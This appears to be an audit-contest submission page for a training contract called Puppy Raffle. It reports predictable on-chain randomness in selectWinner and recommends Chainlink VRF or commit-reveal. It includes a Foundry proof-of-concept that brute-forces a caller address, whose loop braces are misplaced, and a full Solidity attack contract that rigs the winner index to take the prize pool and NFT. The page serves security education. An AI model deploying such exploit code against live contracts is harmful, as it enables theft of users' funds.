Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak on-chain randomness allows an attacker to influence the raffle winner and the minted puppy rarity.

gush

Root + Impact

Description

The `PupplyRaffle::selectWinner` uses predictable / manipulable on-chain values to generate randomness.

- Winner index RNG: `uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;`

- Rarity RNG: `uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;`

Because `msg.sender` is controlled by the caller and block values can be influenced by block producers, this RNG is not suitable for a fair raffle.

// Root cause in the codebase with @> marks to highlight the relevant section

Risk

Likelihood:

When the raffle is drawable, the attacker can compute the outcome for different caller addresses (EOAs / smart wallets) and only call `selectWinner` from an address that results in the attacker being selected, or coordinate with a builder to include a favorable timestamp.

Impact:

A motivated attacker (or a miner / builder / MEV searcher) can bias the selection, winning the prize pool more often than expected and also biasing the rarity distribution.

Proof of Concept

Place the following test into `PuppyRaffleTest.t.sol`.

```solidity

function test_weakRandomness_bruteforceCallerToPickWinner() public {

// Deploy a fresh raffle with short duration

PuppyRaffle raffle = new PuppyRaffle(1 ether, address(123), 0);

// Enter 4 players, with the attacker at index 0

address attacker = address(1337);

address[] memory players = new address[](4);

players[0] = attacker;

players[1] = address(1);

players[2] = address(2);

players[3] = address(3);

vm.deal(address(this), 4 ether);

raffle.enterRaffle{value: 4 ether}(players);

// Make the raffle drawable

vm.warp(1_000);

// If your forge version supports it, fix difficulty to make this fully deterministic

// vm.difficulty(2);

// Brute force a caller address that results in winnerIndex == 0

address caller;

for (uint256 i = 10; i < 10_000; i++) {

address candidate = address(uint160(i));

uint256 winnerIndex = uint256(

keccak256(abi.encodePacked(candidate, block.timestamp, block.difficulty))

) % 4;

if (winnerIndex == 0) {

caller = candidate;

break;

}

assertTrue(caller != address(0));

// Call selectWinner from the chosen caller

vm.prank(caller);

raffle.selectWinner();

assertEq(raffle.previousWinner(), attacker);

}

```

Recommended Mitigation

Use a verifiable randomness source (e.g. Chainlink VRF), or a commit-reveal scheme, and avoid using `block.timestamp/block.difficulty` as the sole randomness source.

High-level sketch (VRF / commit-reveal): ensure `selectWinner()` consumes an unbiasable `randomWord` instead of locally-derived entropy.

```diff

- uint256 winnerIndex =

- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

+ uint256 winnerIndex = randomWord % players.length;

- uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

+ uint256 rarity = uint256(keccak256(abi.encodePacked(randomWord, tokenId))) % 100;

```

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 2 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!